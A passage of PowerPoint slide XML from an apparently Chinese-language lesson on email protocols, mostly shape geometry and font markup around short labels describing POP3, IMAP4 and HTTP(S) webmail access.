              <a:gd name="T18" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T19" fmla="*/ 556261 h 550192"/>
              <a:gd name="T20" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T21" fmla="*/ 529105 h 550192"/>
              <a:gd name="T22" fmla="*/ 0 w 7776864"/>
              <a:gd name="T23" fmla="*/ 463547 h 550192"/>
              <a:gd name="T24" fmla="*/ 0 w 7776864"/>
              <a:gd name="T25" fmla="*/ 92713 h 550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6864"/>
              <a:gd name="T40" fmla="*/ 0 h 550192"/>
              <a:gd name="T41" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T42" fmla="*/ 550192 h 550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6864" h="550192">
                <a:moveTo>
                  <a:pt x="0" y="91701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67380"/>
                  <a:pt x="9661" y="44056"/>
                  <a:pt x="26859" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44056" y="9662"/>
                  <a:pt x="67381" y="0"/>
                  <a:pt x="91701" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7685163" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7709484" y="0"/>
                  <a:pt x="7732808" y="9661"/>
                  <a:pt x="7750005" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7767202" y="44056"/>
                  <a:pt x="7776864" y="67381"/>
                  <a:pt x="7776864" y="91701"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7776864" y="458491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7776864" y="482812"/>
                  <a:pt x="7767203" y="506136"/>
                  <a:pt x="7750005" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7732808" y="540530"/>
                  <a:pt x="7709483" y="550192"/>
                  <a:pt x="7685163" y="550192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91701" y="550192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67380" y="550192"/>
                  <a:pt x="44056" y="540531"/>
                  <a:pt x="26859" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9662" y="506136"/>
                  <a:pt x="0" y="482811"/>
                  <a:pt x="0" y="458491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91701"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99248" tIns="99248" rIns="99248" bIns="9924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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（邮局协议）</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59398" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2811463"/>
            <a:ext cx="7777162" cy="323850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 0 h 324472"/>
              <a:gd name="T2" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T3" fmla="*/ 0 h 324472"/>
              <a:gd name="T4" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T5" fmla="*/ 318916 h 324472"/>
              <a:gd name="T6" fmla="*/ 0 w 7776864"/>
              <a:gd name="T7" fmla="*/ 318916 h 324472"/>
              <a:gd name="T8" fmla="*/ 0 w 7776864"/>
              <a:gd name="T9" fmla="*/ 0 h 324472"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7776864"/>
              <a:gd name="T16" fmla="*/ 0 h 324472"/>
              <a:gd name="T17" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T18" fmla="*/ 324472 h 324472"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7776864" h="324472">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7776864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7776864" y="324472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="324472"/>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6915" tIns="24130" rIns="135128" bIns="2413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14300" indent="-1143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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>目前的版本为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POP3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>是把邮件从电子邮箱中传输到本地计算机的协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59399" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="3135313"/>
            <a:ext cx="7777162" cy="550862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 92711 h 550192"/>
              <a:gd name="T2" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T3" fmla="*/ 27156 h 550192"/>
              <a:gd name="T4" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T5" fmla="*/ 0 h 550192"/>
              <a:gd name="T6" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T7" fmla="*/ 0 h 550192"/>
              <a:gd name="T8" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T9" fmla="*/ 27156 h 550192"/>
              <a:gd name="T10" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T11" fmla="*/ 92711 h 550192"/>
              <a:gd name="T12" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T13" fmla="*/ 463540 h 550192"/>
              <a:gd name="T14" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T15" fmla="*/ 529097 h 550192"/>
              <a:gd name="T16" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T17" fmla="*/ 556252 h 550192"/>
              <a:gd name="T18" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T19" fmla="*/ 556252 h 550192"/>
              <a:gd name="T20" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T21" fmla="*/ 529097 h 550192"/>
              <a:gd name="T22" fmla="*/ 0 w 7776864"/>
              <a:gd name="T23" fmla="*/ 463540 h 550192"/>
              <a:gd name="T24" fmla="*/ 0 w 7776864"/>
              <a:gd name="T25" fmla="*/ 92711 h 550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6864"/>
              <a:gd name="T40" fmla="*/ 0 h 550192"/>
              <a:gd name="T41" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T42" fmla="*/ 550192 h 550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6864" h="550192">
                <a:moveTo>
                  <a:pt x="0" y="91701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67380"/>
                  <a:pt x="9661" y="44056"/>
                  <a:pt x="26859" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44056" y="9662"/>
                  <a:pt x="67381" y="0"/>
                  <a:pt x="91701" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7685163" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7709484" y="0"/>
                  <a:pt x="7732808" y="9661"/>
                  <a:pt x="7750005" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7767202" y="44056"/>
                  <a:pt x="7776864" y="67381"/>
                  <a:pt x="7776864" y="91701"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7776864" y="458491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7776864" y="482812"/>
                  <a:pt x="7767203" y="506136"/>
                  <a:pt x="7750005" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7732808" y="540530"/>
                  <a:pt x="7709483" y="550192"/>
                  <a:pt x="7685163" y="550192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91701" y="550192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67380" y="550192"/>
                  <a:pt x="44056" y="540531"/>
                  <a:pt x="26859" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9662" y="506136"/>
                  <a:pt x="0" y="482811"/>
                  <a:pt x="0" y="458491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91701"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99248" tIns="99248" rIns="99248" bIns="9924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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>邮件访问协议）</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59400" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="3686175"/>
            <a:ext cx="7777162" cy="323850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 0 h 324472"/>
              <a:gd name="T2" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T3" fmla="*/ 0 h 324472"/>
              <a:gd name="T4" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T5" fmla="*/ 318916 h 324472"/>
              <a:gd name="T6" fmla="*/ 0 w 7776864"/>
              <a:gd name="T7" fmla="*/ 318916 h 324472"/>
              <a:gd name="T8" fmla="*/ 0 w 7776864"/>
              <a:gd name="T9" fmla="*/ 0 h 324472"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7776864"/>
              <a:gd name="T16" fmla="*/ 0 h 324472"/>
              <a:gd name="T17" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T18" fmla="*/ 324472 h 324472"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7776864" h="324472">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7776864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7776864" y="324472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="324472"/>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6915" tIns="24130" rIns="135128" bIns="2413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14300" indent="-1143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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>目前的版本为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IMAP4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的一种替代协议，提供了邮件检索和邮件处理的新功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59401" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="4010025"/>
            <a:ext cx="7777162" cy="550863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 92713 h 550192"/>
              <a:gd name="T2" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T3" fmla="*/ 27156 h 550192"/>
              <a:gd name="T4" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T5" fmla="*/ 0 h 550192"/>
              <a:gd name="T6" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T7" fmla="*/ 0 h 550192"/>
              <a:gd name="T8" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T9" fmla="*/ 27156 h 550192"/>
              <a:gd name="T10" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T11" fmla="*/ 92713 h 550192"/>
              <a:gd name="T12" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T13" fmla="*/ 463547 h 550192"/>
              <a:gd name="T14" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T15" fmla="*/ 529105 h 550192"/>
              <a:gd name="T16" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T17" fmla="*/ 556261 h 550192"/>
              <a:gd name="T18" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T19" fmla="*/ 556261 h 550192"/>
              <a:gd name="T20" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T21" fmla="*/ 529105 h 550192"/>
              <a:gd name="T22" fmla="*/ 0 w 7776864"/>
              <a:gd name="T23" fmla="*/ 463547 h 550192"/>
              <a:gd name="T24" fmla="*/ 0 w 7776864"/>
              <a:gd name="T25" fmla="*/ 92713 h 550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6864"/>
              <a:gd name="T40" fmla="*/ 0 h 550192"/>
              <a:gd name="T41" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T42" fmla="*/ 550192 h 550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6864" h="550192">
                <a:moveTo>
                  <a:pt x="0" y="91701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67380"/>
                  <a:pt x="9661" y="44056"/>
                  <a:pt x="26859" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44056" y="9662"/>
                  <a:pt x="67381" y="0"/>
                  <a:pt x="91701" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7685163" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7709484" y="0"/>
                  <a:pt x="7732808" y="9661"/>
                  <a:pt x="7750005" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7767202" y="44056"/>
                  <a:pt x="7776864" y="67381"/>
                  <a:pt x="7776864" y="91701"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7776864" y="458491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7776864" y="482812"/>
                  <a:pt x="7767203" y="506136"/>
                  <a:pt x="7750005" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7732808" y="540530"/>
                  <a:pt x="7709483" y="550192"/>
                  <a:pt x="7685163" y="550192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91701" y="550192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67380" y="550192"/>
                  <a:pt x="44056" y="540531"/>
                  <a:pt x="26859" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9662" y="506136"/>
                  <a:pt x="0" y="482811"/>
                  <a:pt x="0" y="458491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91701"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99248" tIns="99248" rIns="99248" bIns="9924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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP(S)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59402" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="4560888"/>
            <a:ext cx="7777162" cy="323850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 0 h 324472"/>
              <a:gd name="T2" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T3" fmla="*/ 0 h 324472"/>
              <a:gd name="T4" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T5" fmla="*/ 318916 h 324472"/>
              <a:gd name="T6" fmla="*/ 0 w 7776864"/>
              <a:gd name="T7" fmla="*/ 318916 h 324472"/>
              <a:gd name="T8" fmla="*/ 0 w 7776864"/>
              <a:gd name="T9" fmla="*/ 0 h 324472"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7776864"/>
              <a:gd name="T16" fmla="*/ 0 h 324472"/>
              <a:gd name="T17" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T18" fmla="*/ 324472 h 324472"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7776864" h="324472">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7776864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7776864" y="324472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="324472"/>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6915" tIns="24130" rIns="135128" bIns="2413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14300" indent="-1143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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>通过浏览器使用邮件服务时使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59403" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="4884738"/>
            <a:ext cx="7777162" cy="550862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 92711 h 550192"/>
              <a:gd name="T2" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T3" fmla="*/ 27156 h 550192"/>
              <a:gd name="T4" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T5" fmla="*/ 0 h 550192"/>
              <a:gd name="T6" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T7" fmla="*/ 0 h 550192"/>
              <a:gd name="T8" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T9" fmla="*/ 27156 h 550192"/>
              <a:gd name="T10" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T11" fmla="*/ 92711 h 550192"/>
              <a:gd name="T12" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T13" fmla="*/ 463540 h 550192"/>
              <a:gd name="T14" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T15" fmla="*/ 529097 h 550192"/>
              <a:gd name="T16" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T17" fmla="*/ 556252 h 550192"/>
              <a:gd name="T18" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T19" fmla="*/ 556252 h 550192"/>
              <a:gd name="T20" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T21" fmla="*/ 529097 h 550192"/>
